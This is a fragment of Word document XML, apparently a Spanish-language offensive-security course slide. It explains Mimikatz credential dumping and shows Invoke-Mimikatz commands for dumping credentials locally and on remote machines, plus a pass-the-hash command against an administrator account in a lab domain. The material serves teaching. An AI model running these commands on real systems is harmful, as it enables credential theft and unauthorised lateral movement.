                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EB3AD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="340" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181FDA94" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="570" w:lineRule="exact"/>
        <w:ind w:left="751"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911145E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F472141" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1830"/>
        </w:tabs>
        <w:ind w:left="1830" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Se utiliza para volcar credenciales, vales de Kerberos, etc., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>memoria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3A2EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="65"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201DBEDB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1830"/>
        </w:tabs>
        <w:ind w:left="1830" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se ejecuta con privilegios administrativos para realizar operaciones de volcado de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F94DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6E3900" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1830"/>
        </w:tabs>
        <w:ind w:left="1830" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ej : (Como administrador)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D8B9F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20320557" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="119"/>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0480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="567C1534" wp14:editId="7146425B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2545079</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>251287</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7061200" cy="1056640"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0" cy="1056640"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="35C43CE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="190"/>
                              <w:ind w:left="4" w:right="4"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>mimikatz</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> -</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dumpcreds</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> -verbose</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="446170DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="217"/>
                              <w:ind w:right="4"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Invoke-Mimikatz –DumpCreds –ComputerName @("comp1","comp2")</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="567C1534" id="Textbox 530" o:spid="_x0000_s1277" type="#_x0000_t202" style="position:absolute;margin-left:200.4pt;margin-top:19.8pt;width:556pt;height:83.2pt;z-index:-15616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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="35C43CE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="190"/>
                        <w:ind w:left="4" w:right="4"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>mimikatz</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> -</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dumpcreds</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> -verbose</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="446170DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="217"/>
                        <w:ind w:right="4"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Invoke-Mimikatz –DumpCreds –ComputerName @("comp1","comp2")</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03A562" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1921"/>
        </w:tabs>
        <w:spacing w:before="402"/>
        <w:ind w:left="1921" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El ataque Pass-the-hash más famoso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC8515" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BA405B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5843D912" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEB649A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7F325A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CBB6855" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9E6337" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735102C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:ind w:left="8042"/>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5427712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F6C8E6D" wp14:editId="72A0BEB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1296924</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-978356</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10137775" cy="1056640"/>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7775" cy="1056640"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7E8BFC5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="428"/>
                              <w:ind w:right="194"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>sekurlsa</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve">::p </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>th</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>user:Administrator</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>domain:cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>/hash:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B5DB874" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="18"/>
                              <w:ind w:right="194"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:w w:val="105"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>/run:powershell.exe"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2F6C8E6D" id="Textbox 531" o:spid="_x0000_s1278" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:102.1pt;margin-top:-77.05pt;width:798.25pt;height:83.2pt;z-index:-17888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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E8BFC5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="428"/>
                        <w:ind w:right="194"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>sekurlsa</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve">::p </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>th</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>user:Administrator</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>domain:cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>/hash:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5B5DB874" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="18"/>
                        <w:ind w:right="194"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:w w:val="105"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>/run:powershell.exe"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E394C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId269"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="480" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CFA170" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667104ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D6DDA1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
